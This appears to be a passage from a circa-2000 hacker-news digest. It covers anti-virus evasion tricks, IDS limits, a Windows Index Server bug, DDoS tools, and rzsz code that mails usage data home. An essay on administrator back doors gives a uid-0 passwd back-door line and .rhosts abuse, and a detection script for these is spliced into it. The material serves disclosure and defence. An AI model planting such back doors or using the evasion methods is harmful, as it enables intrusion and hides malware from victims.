A small list of "new" problems with anti-virus software that have come out in the last few months: compression of the virus with a little used compression algorithm successfully fooled most anti-virus packages (this was fixed in most of them) compression of the virus with some XOR'ing of the data, successfully fooled most anti-virus packages storing the virus in directories not scanned by the anti-virus software, such as "Recycle bin" in windows (user can configure the software to scan that directory usually) exploitation of various buffer overflows in software packages like Outlook so that the virus is run without the user actually being asked if they want to save or run the attachment (fixed) usage of system calls and software in Windows, such as having Outlook email everyone in your address book a copy of the virus addition of some characters to the attached file successfully fooled email anti-virus packages That's all I could find from the last month or two of Bugtraq. Obviously the anti-virus vendors have a ways to go before their products can even be called remotely reliable. The last dozen or so viruses that spread via email have all left the anti-virus vendor community flat footed, the Melissa virus (which was relatively harmless) resulted in several large sites (Microsoft, Intel, etc.) shutting down the mail servers (and in some cases it overwhelmed mail servers causing them to be effectively shut down). It is obvious that anti-virus vendors will always be playing catch-up with the virus writers, which wouldn't be such a problem if anti-virus software updates were released quickly and people installed them. This is however impossible. The life cycle of a virus looks something like: 1. virus is written, tested, possibly deployed on a test network (computers are cheap now) and otherwise honed 2. virus is released, possibly on a selected target (university campus, corporate network, etc.) 3. 
virus (if "successful" in a biological sense) spreads like wildfire, possibly causing severe damage (such as wiping motherboard BIOS chips) 4. someone notices the strange activity, takes whatever data is left over, and sends it to an anti-virus vendor - this is the first point at which people start taking corrective steps, the virus has already had time to spread 5. the virus is analyzed, decompiled, and otherwise ripped apart, a signature is created 6. typically the anti-virus vendor will share data with other competitors, they may or may not do this promptly 7. the anti-virus vendors issue bulletins, make the update (if one exists yet) available 8. some customers with support contracts and so on will be notified, some will have automated distribution systems for the update, resulting in a rapid deployment of the fix, most will not 9. network and system administrators, home users, and so on possibly read the advisory or hear about the virus on CNN, they get the update (which can be near impossible during peak times) and install it During steps 2, 3, 4, 5, and up till 6 the virus will spread unchecked. Once an update is created and distributed the virus will only spread to systems without protection (a good sized percentage). The amount of effort it takes to install software on millions of computers is horrendous, even when heavily automated, compared to the amount of effort a virus author spends, the ROI (return on investment) can be significant. Intrusion detection software Directly related to anti-virus software is intrusion detection software (sometimes refereed to as IDS or NIDS). I'm going to start with a brief explanation of the various intrusion software technologies and types since they overlap and can be somewhat convoluted. 
As a rule of thumb the software has to run on a computer system (that's a pretty safe rule for most software packages actually), and this machine can either be dedicated to the task of monitoring the network and other systems, or the software can be an additional component that runs on a production server. For example we have NFR (Network Flight Recorder) which is an entirely network based system, you have one or more collection machines (a dedicated box, either an appliance system or something you have built yourself), which analyze data, and can funnel it all to a central collection point (allowing you to more easily detect distributed attacks and see patterns of activity). Then there are a variety of products that are loaded onto client machines and report to a central machine via SNMP (or some other protocol), which analyses the data and looks for attacks and so forth, and in between the two are some hybrid systems. As with anti-virus software vendors a major problem with (N)IDS systems is the time frame between when an attack is discovered, and when the (N)IDS systems are updated to detect and react to it accordingly (the life cycle is pretty much identical to that of a virus's life cycle). The next major differentiation is how active a role the software will take when it detects an event, for example some systems can be set to lock out a host computer if it appears hostile, whereas some will simply compare files against signatures to see if they have changed or not and generate a report (and the extreme of this would be forsenic software used "after the fact" to try and determine what happened). This leads to one of the fundamental problems of intrusion detection systems. These systems are typically heavily automated, and sometimes make use of neural networks, artificial intelligence and other techniques in an effort to make them more accurate and useful. 
If you set the detection threshold too low you will detect more events, resulting in a large number of false alarms, and wasted effort. If you set the detection threshold too high you run the risk of missing events that might prove critical to continued operations (a.k.a. a bad person might get in and delete all your archived .... research data). In an effort to get the best of both worlds (low detection threshold, with a minimum of false alarms, and no important events missed) the systems make heavy use of rule sets, content based analysis, and so forth. Unfortunately even the best of these systems are far from perfect. In addition to this you have to act on events, monitoring the network and generating a detailed report of attacks, which is useless if you do not use it constructively. Again we discover a fundamental problem, if you give control up to the computer there is a good chance an attacker will be able to abuse it and possibly circumvent it, whereas if you have a human respond to each event the cost and time involved would be prohibitive. Striking a balance between a low detection threshold and a high one, in addition to letting either the computer handle it, or a human is a critical process (it is not a single decision, since you should be evaluating results constantly and fine tuning it). The same applies to anti-virus software, you want to get the updates to the machines as fast as possible, which means automation where possible, however there are some basic issues that can severely delay the time between a virus rampaging around networks, and a successful counter to it. Even if you have instantaneous updates of your anti-virus software and intrusion detection systems, there is still a timeframe in which you can be successfully attacked. But this doesn't make anti-virus software and intrusion detection systems worthless, far from it. 
Security is about risk management and risk minimization, often within a budget and time constraints (few organizations can write a blank check as far as computer security is concerned). The real question is will the ROI (return on investment) be worthwhile, e.g. armed security guards at every workstation to make sure no-one tampers with them would be nice, but not terribly cost effective. In addition to this there are intrusion detection software packages that only detect an attack after the fact, such as tripwire. This is however not as useless as it would seem at first blush (someone stole all the silverware, guess we should buy a new set). A part of all security incidents is discovering the scope of the problem (did they only get into one machine, or did they get into a few hundred?), and tools like tripwire can make this task much more easy (in fact some vendors are now shipping integrity checking software that can be loaded onto a bootable floppy so you can get a very secure snapshot of the system that you can compare securely, of course it requires a server reboot). Conclusion Computer security doesn't come in nice shrink wrapped box for $99.95 (after a $50 rebate). Computer security is an ongoing process, with constant re-evaluation and changes, as new threats and solutions are released, you need to be able to react to them effectively. Ideally vendors would ship software that was not susceptible to viruses (this is possible), nor susceptible to user/network/random events resulting in improper operation (like giving someone a root shell remotely). This isn't going to happen for along time however (although there is a variety of hardening software becoming available). Anti-virus software and intrusion detection systems (passive and active) are all part of a healthy security policy implementation. Any security plan implementation, when properly done will require some degree of human intervention. 
If possible you should dedicate people to the task, and possibly have them fulfill other optional duties (like evaluating new software for possible future use). If the people you have tasked are responsible for support, chances are they will spend the majority of their time running around and putting out fires instead of preventing a massive firestorm. Kurt Seifried(seifried@seifried.org) is a security analyst and the author of the "Linux Administrators Security Guide", a source of natural fiber and Linux security, part of a complete breakfast. Related links: Virus paper: http://www.sophos.com/virusinfo/whitepapers/futurevi.html IBM article / interview on new virus detection / eradication technology http://www.ibm.com/stretch/mindshare/white.phtml Network intrusion activity: http://www.sans.org/y2k.htm 5 (N)IDS vendors respond to questions: http://www.gocsi.com/ques.htm Lessons Learned in the Implementation of a Multi-Location Network Based Real Time Intrusion Detection System: http://www.zurich.ibm.com/pub/Other/RAID/Prog_RAID98/Full_Papers/Puldy_sl ides.html/index.htm Design of an NIDS system: http://www.cs.ucsb.edu/~kemm/netstat.html/projects.html File integrity checking software: http://www.tripwiresecurity.com http://www.suse.de/~marc/ @HWA 140.0 Win2000 security hole a 'major threat' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.zdnet.com/zdnn/stories/news/0,4586,2429334,00.html?chkpt=zdnntop Win2000 security hole a 'major threat' Six banks and three major PC makers are affected by a bug that lets attackers view files stored on Microsoft Index Server. Microsoft issues patch. By David Raikow, Sm@rt Reseller UPDATED February 1, 2000 9:37 AM PT Windows 2000 is not scheduled for release until Feb. 17, but Microsoft has already released the first patch affecting the long-awaited operating system. 
The patch, released by Microsoft on Wednesday, repairs two different security bugs in Microsoft Index Server, the more egregious of which allows hackers to view files stored on a target Web server. Index Server is an add-on to Windows NT 4.0 and is built into Windows 2000 (in the form of Indexing Services). Index Server provides developers with Active Scripting and query management capabilities.

The more dangerous of the two problems, dubbed the "Malformed Hit-Highlighting Argument Vulnerability" by Microsoft (Nasdaq: MSFT), was spotted by David Litchfield of Cerberus Information Security on Jan. 17 and immediately reported to Microsoft security. The bug allows attackers to view files stored on a target Web server and represents a major threat, according to Litchfield.

"Of course, ideally you make sure there's no sensitive data on your Web server, but this can be incredibly difficult," Litchfield said. "A lot of servers have account passwords and user names on them. Even under the best of circumstances you can end up with account information and sometimes credit card numbers stored in temporary files on the server. You should clear those files out regularly, but you still end up with a 'race condition' where attackers can try to grab them before they're erased."

Microsoft: It's all serious

"It's not for us to assess the seriousness of this problem, because we take all security risks seriously," said Microsoft Security Manager Scott Culp. "The important thing now is that the patch is out, and that it fixes the problem. All of our customers should check out our security site."

However, Litchfield's investigation of the bug suggests that the majority of Windows-based servers are at risk. He confirmed that at least six banks and three major computer manufacturers were affected by the bug.

"The problem is that Index Server is active by default, so most people don't even realize they've got it on. Even if they see an MS alert, they're probably not going to realize that it applies to them," Litchfield said.

Culp acknowledged that many users may have the Index Server active without realizing it. "Of course, from a security perspective, you shouldn't offer any services you don't use," Culp said. "We want to make sure our customers are educated about this, and that they are aware of which services they have active and how to disable what they don't need. We've also given Windows 2000 tighter defaults and made it much easier to configure."

Second bug relatively minor

The second of the two bugs allows an intruder to access information about the targeted network, but it is considered relatively minor. Although several specialists assert that this problem has been publicly discussed for several months, Culp stated that Microsoft only became aware of it within the past two weeks.

According to Culp, both of these problems were discovered too late to be fixed in the shipping version of Windows 2000. "These came to our attention in mid-January, and Windows 2000 went out to OEMs and many customers Dec. 15. It's a shipping product, and we're supporting it as any other shipping product."

Microsoft released Windows 2000 to manufacturing on Dec. 15 and delivered it to hardware makers and some other key partners on that date. Large customers and developers received the gold code in early- to mid-January. The product will be available through retail starting Feb. 17.

@HWA

141.0 New hack attack is greater threat than imagined
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by Dragos Ruiu

http://www.theregister.co.uk/000127-000005.html?&_ref=1188363377

New hack attack is greater threat than imagined

It was news a month ago; days later it vanished.
The mainstream press may have forgotten it, but security specialists gathered in California last week for the sixth RSA Conference to consider the growing trend in malicious computer assaults called distributed denial of service (DDoS) attacks.

Using tools called trin00 and tribe flood network (TFN), intruders can commandeer hundreds, possibly thousands, of separate, unsuspecting clients to launch a flood which can bring a network down in a torrent of packets all appearing to come from different sources, making it impossible to identify the origin.

Dealing with this sort of assault can be maddening for the primary victim. The clients from which the attack is launched are themselves intermediate victims who rarely know that their systems have been compromised. They are in diverse locations around the world, administered by people who speak different languages, making it nearly impossible for one victim to explain to another how to cope with the threat.

Security experts are not optimistic. The tools do not require an intruder to gain root access to a system, but can be uploaded via a number of simpler exploits, many of which can be scripted to run automatically, and even multi-threaded to run very, very fast. Finding weak systems to use as clients for a distributed attack is neither difficult nor prohibitively time consuming.

More ominously, DSL and cable modems, which remain connected around the clock, make it possible to launch attacks through the growing number of private Linux boxes now online. "We've already seen these attacks coming through Linux boxes," ISCA Director of Research Services David Kennedy told The Register. "And there's no reason why it can't be ported to the Win-32 [operating system]," he added.

To further complicate matters, merely killing the process during a distributed flood attack is not adequate to end it. So long as the hundreds of clients remain infected, an attack can be resumed, Kennedy says.

We note that communicating with the owners and administrators of hundreds of compromised clients, and gaining their cooperation, would be virtually impossible. The victim is, for all practical purposes, at the mercy of the attacker.

The FBI's National Infrastructure Protection Center (NIPC) has developed an application to detect the malicious tools, though the first indication that they've been installed will usually be a phone call from a frantic sysadmin trying desperately to block the onslaught of packet traffic. We say 'phone call' because a distributed attack capitalises on so much bandwidth from so many sources that it literally overwhelms entire networks. Under those circumstances, e-mail is hardly going to work.

An ISP can turn off the attack, provided its administrators are well enough acquainted with the problem; but there again, nothing can stop an attacker from firing up his hundreds of compromised clients hours or days later if he chooses.

It gets worse; most of the more obvious defences are problematic. For example, a firewall configured to catch a distributed flood attack would also interrupt such utility functions as ping and traceroute, which are commonly used by administrators and power users, Kennedy noted.

The tools are in constant development within the hacker underground; new and better versions are released regularly. Most worrying is a shift to scripted attacks which allow unsophisticated users, such as bored teenagers, half-assed hacker wannabes and clueless script kiddies to launch them.

The tools are getting more powerful, slicker and easier to use. Defences are not. Defences require the infected clients, not the end victims, to take action. Human nature being what it is, we reckon the end victims are pretty well on their own.

The NIPC offers an unsettling insight: "Possible motives for this malicious activity include....preparation for widespread denial of service attacks."

We wonder what "widespread" means here. If one malicious hacker can exploit hundreds of clients worldwide and retain them for repeated abuse, what might a hundred accomplish? And what effect might that have? Could enough bandwidth be gobbled up to crash large portions of the Net? Could ISPs be overwhelmed for hours, even days? Could infrastructure be at risk?

The NIPC refuses to say, but our imaginations are very much stimulated by the possibilities. And we reckon yours ought to be as well. ®

@HWA

142.0 NSA gets bitten in the ass too
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by Dragos Ruiu

( I would be interested to find out if this was a DDoS.... since that is the topic du jour. I would imagine NSW Dragon got a workout chasing these guys down, successfully it seems - but we'll never hear about it officially I think. If that is the case, congrats Ron. --dr :-)

(Comments were Dragos' - Ed)

http://abcnews.go.com/sections/us/DailyNews/nsa000129.html

NSA Confirms `Serious Computer Problem'

W A S H I N G T O N, Jan. 29 - The super-secret National Security Agency confirmed tonight that it had a "serious computer problem" last week that affected its ability to process intelligence information. The agency issued a brief statement a few hours after the outage was reported by ABCNEWS. Sources characterized the problem as the biggest computer failure in the history of the NSA.

From Monday night until late Thursday, computers at Fort Meade, just outside Washington, were unable to process the millions of communications intercepts flowing in from around the world via a series of U.S. satellites. The statement said the agency "is currently operating within the window of normal operations."

NSA Director Air Force Lt. Gen. Michael Hayden told ABCNEWS that the system has been almost totally rebuilt in the past five days, although it is not quite fully up yet. Officials said it did not appear to be sabotage, just a computer system overwhelmed trying to digest data.
$1.5 Million Problem

The NSA said it took thousands of man-hours and some $1.5 million to get the computers up and running again at the agency's headquarters at Fort Meade, Maryland. As a result of the unprecedented blackout of information, analytical reports from Fort Meade that turn intercepted foreign telephone, cable and radio messages into meaningful data for the rest of government were halted.

"This problem ... did not affect intelligence collection, but did affect the processing of intelligence information," the statement said. "The backlog of intelligence processing is almost complete, and NSA is confident that no significant intelligence information has been lost."

The Washington Post quoted one official describing the outage as a "software anomaly." "As of now, there is no evidence other than this was a system stressed to meet day-to-day operational pressures," the paper quoted the official as saying.

Dangerous Times

This was an especially dangerous time for something like this to happen. The system uses the data to track terrorists, among other things, including suspected ringleader Osama bin Laden - monitoring them, issuing warnings and keeping the United States one step ahead.

"This problem, which was contained to the NSA headquarters complex at Fort Meade, Md., did not affect intelligence collection, but did affect the processing of intelligence information," the agency statement said. "NSA systems were impacted for 72 hours."

"Contingency plans were immediately put into effect that called on other aspects of the NSA system to assume some of the load," the agency statement said. "While intelligence collection continued, NSA technicians worked to recover the IT (information technology) infrastructure. That backlog of intelligence processing is almost complete and NSA is confident that no significant intelligence information has been lost."

The latest incident follows the failure of a critical U.S. spy satellite system on New Year's Eve, the most significant known casualty of the Year 2000 computer glitch (see related story).

`No Such Agency'

Until a few years ago, the National Security Agency - known around Washington as "No Such Agency" - was so secret there was no public acknowledgment by the government of its existence and employees could be disciplined for merely saying they worked there. It specializes in electronic intelligence gathering through satellites, telephone intercepts and other methods.

The Defense Department acknowledged earlier this month that it made mistakes in its pre-New Year's Eve testing of a Y2K correction for a computer system that processes imagery from intelligence satellites. The computer system broke down that night, interrupting the flow of satellite information for several hours. However, the Pentagon insisted the trouble did not jeopardize U.S. national security.

ABCNEWS' John McWethy and The Associated Press and Reuters contributed to this report.

@HWA

143.0 rzsz package calls home if you don't register the software.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From BUGTRAQ
From: Kris Kennaway <kris@HUB.FREEBSD.ORG>
To: <BUGTRAQ@SECURITYFOCUS.COM>
Sent: Saturday, January 29, 2000 7:14 PM
Subject: rzsz emails usage stats without user consent

Recent versions of the (shareware) UNIX rzsz package from Omen Software, available from ftp://ftp.cs.pdx.edu/pub/zmodem/, contain the "feature" that if your version is unregistered, it will send mail to rzsz@omen.com each time you upload and download using the software - rz.c and sz.c contain the following code:

    #ifndef REGISTERED
    /* Removing or disabling this code without registering is theft */
        if ((Totfiles > 0) && (!Usevhdrs)) {
            sprintf(endmsg,
              "echo Unreg %s %s %ld %ld | mail rzsz@omen.com",
              Progname, VERSION, Totfiles, Totbytes );
            system(endmsg);
            canit();
            sleep(4);
            fprintf(stderr, "\n\n\n**** UNREGISTERED COPY *****\r\n");
            fprintf(stderr, "Please read the License Agreement in rz.doc\r\n");
            fflush(stderr);
        }
    #endif

This change was detected because the FreeBSD ports system uses an MD5 checksum to verify the integrity of downloaded software - the rzsz.zip file has a habit of changing regularly, and after one such change this addition was discovered.

Thanks to Marcin Cieslak <saper@system.pl> for identifying this problem.

The rzsz port has since been removed from the FreeBSD ports collection :-)

Kris Kennaway

----
"How many roads must a man walk down, before you call him a man?"
"Eight!"
"That was a rhetorical question!"
"Oh..then, seven!" -- Homer Simpson

@HWA

144.0 Clinton calls Internet Summit on the DDoS threat
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://webcrawler-news.excite.com/news/r/000211/22/news-tech-hackers

Web Probe Widens, Clinton Calls Internet Summit

Updated 10:23 PM ET February 11, 2000

By Dick Satran

SAN FRANCISCO (Reuters) - U.S. investigators tracking hackers who shut down top Web sites turned their focus to the sites used to launch the attacks on Friday as President Clinton called a summit on Internet security for next week.
The Federal Bureau of Investigation was backtracking through sites that were penetrated and used as "zombies" to hit others. The agency, at a briefing this week, underscored the importance of "unwitting third parties" used by the attackers to conceal themselves while launching massive coordinated attacks on the top e-commerce sites.

The University of California-Santa Barbara said that its computer system was used to aim an attack at the CNN Web site brought down in the week's wave of Internet sabotage, a spokesman said Friday. The university said it was providing details to the FBI for the investigation.

"ZOMBIE" ATTACKER FOUND

In Palo Alto, meanwhile, computer security company Network Associates Inc (NETA.O) said it had located another one of the "zombies" used to launch the attacks -- a computer in Germany which has since been disconnected from the Internet.

But while the university and the security firm stepped forward, computer experts said scores more remained silent, fearing legal action or involvement in costly criminal probes.

"People want to stay out of the way," said Stuart McClure, president of the Irvine, California-based Ramparts Security Group. "People are real sensitive about these issues -- they think the perception would be negative."

Perceptions of Internet security took another hit on Friday when a small California Internet company said an unrelated hacker attack on its system this week had apparently gained access to consumer credit card numbers.

RealNames, a San Carlos, California, business, said the extent of the damage was hard to assess because the attack had come through mainland China, and the connection appeared to have shut down while the hackers were downloading data.

"Our best guess is that this was done by a traditional hacker, whose goal is not to steal but to prove that he has the ability to steal," said RealNames chief executive Keith Teare, whose company sells a simplified Internet address system to about 50,000 customers.

In Washington, Clinton's summit is expected to boost broader cooperation in a young industry that's growing fast and hasn't made security a high priority. The industry, in turn, wants to give advice to federal regulators seen as too unsophisticated in Web ways to have much impact.

Clinton warned not to expect Tuesday's meeting to come up with an "instantaneous solution" to a wave of hacking attacks which this week took down popular sites Yahoo!, the largest independent Web site, leading retailers Buy.com, eBay, Amazon.com and the news site CNN.com.

While computer security has often vexed individual computer users linked to the Internet, major Web sites have been hit only by sporadic outages, and nothing like the chaos of the past week.

BROADER COOPERATION

The U.C.-Santa Barbara report was one of the first to indicate that the hackers' tracks were slowly being uncovered. FBI spokeswoman Debbie Weierman refused to comment on the UC-Santa Barbara report. She said no search or arrest warrants had yet been issued in connection with the investigation.

At the university, spokesman Bill Schlotter said a climate of academic freedom left facilities vulnerable. "We're a university, and you want to keep your system open for students and faculty, but you want it to be secure. How do you do both?" he asked.

The wave of hacker attacks prompted little surprise in either the computer security industry or the hacker community. The attacks have relied on easy-to-find tools available over the Internet, and sites with poor security to use as their staging areas. Those "third party" sites are the ones -- not the large ones suffering the attacks -- that the FBI cited as the biggest security risks.

"All these littler sites are worried about is getting their site up and then the Webmaster is in charge, and there is no attention paid at all to security," said one hacker, known as YTCracker, interviewed by Reuters. "Usually, it doesn't take anything to get in."
@HWA 145.0 ISN: Who gets your trust? ~~~~~~~~~~~~~~~~~~~~~~~~~ Source: ISN list Who gets your trust? Security breaches can come from those you least suspect Summary Systems administrators have extraordinary access to all the data on corporate systems. What can be done to ensure that your administrators will not betray that trust? (3,000words) In the business world you will often hear the statement "We don't hire hackers." When pressed for a reason, the speaker usually reveals a fear that a "hacker" will install a back door in the system. Time and time again, however, I have seen back doors installed by employees or security professionals whose integrity is never questioned. When confronted, they usually say it's no big deal. After all, they have the root password. They just wanted to set up a root account with a different environment. That's not hacking, right? Wrong. Their intention did not matter -- the security of the system has been bypassed. This article discusses how administrative privileges can be abused and suggests some methods for countering that abuse. It is not meant to imply that every administrator abuses privileges or has malicious intent -- just that you shouldn't assume anything. What is a back door? Quite simply, a back door is a method for gaining access to a system that bypasses the usual security mechanisms. (Has everyone seen WarGames?) Programmers and administrators love to stick back doors in so they can access the system quickly to fix problems. Usually, they rely on obscurity to provide security. Think of approaching a building with an elaborate security system that does bio scans, background checks, the works. Someone who doesn't have time to go through all that might just rig up a back exit so they can step out for a smoke -- and then hope no one finds out about it. In computer systems, a back door can be installed on a terminal server to provide direct access to the console remotely, saving the administrator a trip to the office. 
It can also be a program set up to invoke system privileges from a nonprivileged account. A simple back door is an account set up in the /etc/passwd file that looks like any other userid. The difference is that this userid doesn't have to su to root (and it won't show up in /var/adm/sulog) -- it already is root: auser:x:0:101:Average User :/home/auser:/bin/ksh If you don't see it, look again at the third field (userid) and compare it to the root account. They are the same (0). If you are restricting direct root logins to the console only (via /etc/default/login), then this account will have the same limitation. The difference is that if someone does su to this account, it will not be apparent in /var/adm/sulog that it is root. Also, a change to the root password will not affect the account. Even if the person who installed the account intends no harm, he or she has left a security hole. It is also pretty common for an administrator to abuse the /.rhosts file by putting in desktop systems "temporarily." These have a way of becoming permanent. Back doors can also be set up in subtler ways though SUID 0 programs (which set the userid to root). Usually, the motivation for setting up back doors is one of expediency. The administrator is just trying to get a job done as quickly as possible. Problems arise later when either (1) he leaves under normal circumstances and the hole remains or (2) he leaves under bad circumstances and wants revenge. Proprietary data A manager may also be reluctant to hire "hackers" for fear that they may divulge proprietary information or take copies of proprietary data. Several years ago, I was consulting at a company when a new administrator joined the group. In an effort to ingratiate himself with the team, he confided that he had kept the backup tapes from his old job (a competitor) and that they had some "really cool tools." It so happened that a consultant with my own business worked at the competitor's site. 
A scan of the tape revealed the proprietary software that the administrator had been working on, which eventually sold for a significant amount of money. While the admin probably did not intend to steal the software, his actions could have left his new employer facing a large lawsuit -- all for the sake of a few shell scripts.

In this particular case, no one believed that the administrator had any ulterior motives. I wonder if people would have felt that way if he had been a "known hacker"?

System monitoring

Administrators are supposed to monitor system logs. How else can problems be investigated? But there is a difference between monitoring logs for a legitimate reason and monitoring them to satisfy prurient curiosity. Using the system log files to monitor a particular user's behavior for no good reason is an abuse of privileges.

What is a good reason? Your manager asks you to monitor specific logs. Or maybe you notice suspicious activities, in which case you should inform the management. Or, more commonly, a user complains about a problem and you are trying to solve it.

What is a bad reason? A user ticks you off and you want to see how he is spending company time. Or a user has a prominent position in the company and you want to know what kinds of Websites she goes to.

Countermeasures

You can take some actions to ensure the integrity of privileged users, but none of them carries any guarantee.

Background checks

You can have an investigative agency run a background check on an individual and you can require drug tests. These tell you only about past behavior (if the individual has been caught).

The state of New Jersey (where I live) has adopted a law commonly referred to as Megan's Law (see Resources). The law mandates that a community be notified of any convicted sex offender living in the community. On the surface, it sounds like a great idea and a way to protect children from predators. As a parent, I am particularly sensitive to crimes against children.
I received a Megan's Law notification this past year about a convicted sex offender who moved into town. It did not change a thing for me. My feeling is that every child molester has to have had a first time and that in any case not all molesters have been identified. Therefore, I take appropriate precautions with my children, regardless of who has moved to the area.

In the technical field, hackers are considered the molesters. (Yes, I know all about the politically correct terms cracker, defacer, etc., but the common term these days is hacker.) How do you know if someone is a "hacker"? Some people try to refine the term to mean "someone who has been convicted of a computer crime." But let's say, for example, that you attend Defcon, the hackers' conference, and encounter an intelligent job seeker with bright blue hair and funky clothes. Would you hire him? Chances are that you would at least scrutinize his credentials and make sure your contract spelled out all details of the work to be performed and the legal repercussions for any violations. What if the same person showed up for an interview with the blue dye rinsed out and in a nice pressed suit? Be honest: would you perform the same background checks regardless of a person's appearance?

Technical measures

Some technical software packages can limit or control superuser privileges. I recommend using them to prevent the inadvertent abuse of superuser privilege. Unfortunately, knowledgeable administrators and programmers with privileged access will be able to circumvent these measures if they really want to.

sudo

The freely available sudo package provides more granular control over the system by restricting which privileged commands can be run on a user basis. See Resources for the Sudo main page, which has a more complete description.

Tripwire

Tripwire is a file integrity package that, following the policy determined by the administrator, reports any changes made to critical files.
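Before a package like Tripwire is in place, the back doors described earlier can be found by hand. The script below is an added example (not code from the article, nor from the sudo or Tripwire projects): it flags uid-0 aliases in a passwd file, trust entries in an .rhosts file, and SUID-root files under a directory. The sample passwd and .rhosts data are constructed, and the function names are my own.

```shell
#!/bin/sh
# Added example: hand checks for the back-door patterns the article describes.
# Point the functions at the real /etc/passwd, /.rhosts and / on a system you
# administer; the sample data below is constructed so the script runs offline.

# Login names of every uid-0 account other than root, one per line.
# Field 3 of a passwd entry is the numeric uid, which is what the kernel
# honours; the name in field 1 is only a label.
find_uid0_aliases() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Number of accounts sharing uid 0 (root included). A clean system gives 1.
count_uid0() {
    awk -F: '$3 == 0 { n++ } END { print n + 0 }' "$1"
}

# Every effective entry in an .rhosts file. Each one grants a passwordless
# remote login; a "+" in either column trusts any host or any user.
# Blank lines and comments are skipped.
rhosts_trust_entries() {
    awk '!/^[ \t]*(#|$)/ { print }' "$1"
}

# SUID-root regular files below a directory, where a subtler back door would
# sit. This queries the live filesystem (run as root, one filesystem at a
# time); nothing in the constructed sample data exercises it.
find_suid_root() {
    find "$1" -xdev -type f -user root -perm -4000 2>/dev/null
}

# --- constructed sample data, not from any real system ---
SAMPLE_PASSWD=$(mktemp)
SAMPLE_RHOSTS=$(mktemp)
trap 'rm -f "$SAMPLE_PASSWD" "$SAMPLE_RHOSTS"' EXIT

cat > "$SAMPLE_PASSWD" <<'EOF'
root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
auser:x:0:101:Average User :/home/auser:/bin/ksh
jdoe:x:1001:10:John Doe:/home/jdoe:/bin/ksh
EOF

cat > "$SAMPLE_RHOSTS" <<'EOF'
# added "temporarily" while debugging the print server
desktop17 jdoe
+ +
EOF

echo "accounts with uid 0: $(count_uid0 "$SAMPLE_PASSWD")"
echo "uid-0 accounts other than root:"
find_uid0_aliases "$SAMPLE_PASSWD"
echo ".rhosts entries granting passwordless login:"
rhosts_trust_entries "$SAMPLE_RHOSTS"
```

On the sample data the script reports two uid-0 accounts, names "auser" as the alias, and lists both .rhosts lines, the "+ +" line being the one that trusts everyone.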
Tripwire was originally developed at Purdue University by Gene Kim under the direction of Eugene Spafford. I plan to evaluate the merits of the commercial version of Tripwire in a future column.

Tripwire is a good way for an administrator to tell whether the system files or permissions have been modified. What can be done, however, if the senior administrator who monitors the system has malicious intent?

Professionalism

The best defense against the abuse of administrator privileges is to rely on a certain level of professionalism. The medical Hippocratic oath includes the mandate Do No Harm. While there is no such professional oath for systems administrators, you can establish guidelines for acceptable behavior.

During the mid-1980s, I worked as an administrator in a computer center at a large telecommunications research facility. We had a code of ethics that a user had to sign before an account could be installed. We also had a code of ethics for privileged users that included additional restrictions, such as:

  No SUID 0 (set userid to root) programs will be installed without the consent, in writing, of the senior administrator.

  All users' email is to be considered private and confidential and may not be read by anyone other than the intended recipient.

  Users' files may not be modified or read except in the case of a predetermined problem or security investigation. Be prepared to justify.

  Privileged users are often entrusted with sensitive information, such as an employee termination, before other employees. This information is to be kept confidential.

  The root passwords are changed monthly and are to be distributed by the senior administrator only. The passwords must be kept in a safe location, such as your wallet. If the password is lost, notify the senior administrator or your manager immediately.

  Keystroke monitoring of user activities is strictly prohibited without senior management approval, in writing.
  All administrative procedures and tools are to be considered proprietary information and are the property of the computer center.

  Tape archives may not be removed from the facility without written approval.

Discretion

A code of ethics for privileged users should not be considered a punitive device, but rather a statement about the integrity of the person who signs it.

At one point during my years in the computer center, the secretary to the president of the company came to me with a printer problem. As I was assisting her, she became upset when she realized that the test job she had sent to the printer was highly confidential. I was able to reassure her that all administrators were bound by a code of ethics and would be terminated for violations. (Besides, I wasn't really reading it, I was just looking for garbage characters!)

Professionals must establish a certain level of trust. This is especially important for those privy to sensitive information regarding terminations or investigations.

Final thoughts

Would I hire someone who showed up for an interview with blue hair, body piercings, and a name like 3v1l HaK0rZ? No. Not because he might install a back door, but because he was ignorant about what was acceptable on Wall Street.

As for the back doors? More are installed by well-groomed "professionals" in suits than by "hackers." Anyone with the required skills can be either a "security consultant" or a "hacker." The only difference is the label.

@HWA

146.0 ISN: Hackers demand 10 Million pounds from Visa
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

UK Telegraph:

http://www.telegraph.co.uk/et?ac=000114832908976&rtmo=quuqKJR9&atmo=99999999&pg=/et/00/1/18/nhack18.html

Hackers demand £10m
By Mark Ward

COMPUTER hackers have demanded a £10 million ransom from Visa, the credit card giant, after claiming to have stolen critical data.
Visa's British head office was contacted just before Christmas by a group which said it obtained the information during a hacking raid last summer. Visa refused to pay the ransom and contacted police.

A Visa spokesman admitted the British-based hackers managed to penetrate its computer network last July but were detected almost immediately and only stole useless information.

He said: "As fast as they were in they were found out. To our knowledge they've not been back in."

Police are investigating and Scotland Yard is understood to have already talked to one suspect.

@HWA

147.0 ISN: Cybercrime growing harder to prosecute
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Forwarded
From: darek.milewski@us.pwcglobal.com

http://www.ecommercetimes.com/news/articles2000/000121-nb1.shtml

By Martin Stone, Newsbytes
Special to the E-Commerce Times
January 21, 2000

U.S. Justice Department officials reportedly called computer crime a growing menace to corporations worldwide, and admitted that law enforcement agents face major hurdles in combating it.

A report by Reuters today said Justice and FBI officials concede there is no such thing as a completely secure computer system. The warning was voiced Thursday at a conference on cybercrime sponsored by the Deloitte & Touche accounting firm, the report said.

Who Is Vulnerable?

"The issue isn't who is vulnerable because everyone is vulnerable. The issue is how are companies going to deal with those vulnerabilities," Reuters quoted Assistant U.S. Attorney Allison Burroughs as saying.

